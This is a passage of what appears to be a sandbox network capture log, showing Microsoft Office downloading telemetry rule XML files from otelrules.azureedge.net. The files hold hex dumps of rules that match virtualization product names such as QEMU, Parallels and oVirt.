                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                      x-ms-request-id: 0a397e49-e01e-0051-357f-3b84b2000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052344Z-1777c6cb754j47wfhC1TEB5wrw00000006k0000000002y1s
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      67192.168.2.64978013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:44 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:44 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                      x-ms-request-id: 3585b350-301e-005d-097c-3be448000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052344Z-178bfbc474bscnbchC1NYCe7eg000000012g00000000pbhn
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      68192.168.2.64978113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:45 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:46 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 485
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                                                      x-ms-request-id: 9ca94d1e-301e-0000-0f9c-3beecc000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052346Z-1777c6cb754g9zd5hC1TEBfvpw0000000ap000000000u184
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:46 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      69192.168.2.64978213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:45 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:46 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 411
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                                                      x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052346Z-1777c6cb754j47wfhC1TEB5wrw00000006kg000000001f3b
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:46 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      70192.168.2.64978313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:45 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:46 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 470
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                                                      x-ms-request-id: 137cb315-101e-0017-3264-3b47c7000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052346Z-178bfbc474bwlrhlhC1NYCy3kg00000000yg00000000mh3x
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:46 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      71192.168.2.64978513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:46 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:47 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 502
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                      x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052347Z-178bfbc474bp8mkvhC1NYCzqnn00000000x0000000005tev
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:47 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      72192.168.2.64978413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:46 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:47 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                                                      x-ms-request-id: 38897a0b-401e-000a-7a8c-3a4a7b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052347Z-1777c6cb754mqztshC1TEB4mkc0000000ang00000000edbe
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:47 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      73192.168.2.64978613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:48 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:48 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                                                      x-ms-request-id: 04c68412-701e-000d-5268-3b6de3000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052348Z-178bfbc474bv587zhC1NYCny5w00000000z0000000003g02
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:48 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      74192.168.2.64978713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:48 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:48 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                      x-ms-request-id: 957844e9-801e-008c-4868-3b7130000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052348Z-178bfbc474bmqmgjhC1NYCy16c000000013g000000008z55
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:48 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      75192.168.2.64978813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:48 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:48 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                      x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052348Z-178bfbc474bvjk8shC1NYC83ns00000000u000000000fg9k
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:48 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      76192.168.2.64978913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:48 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
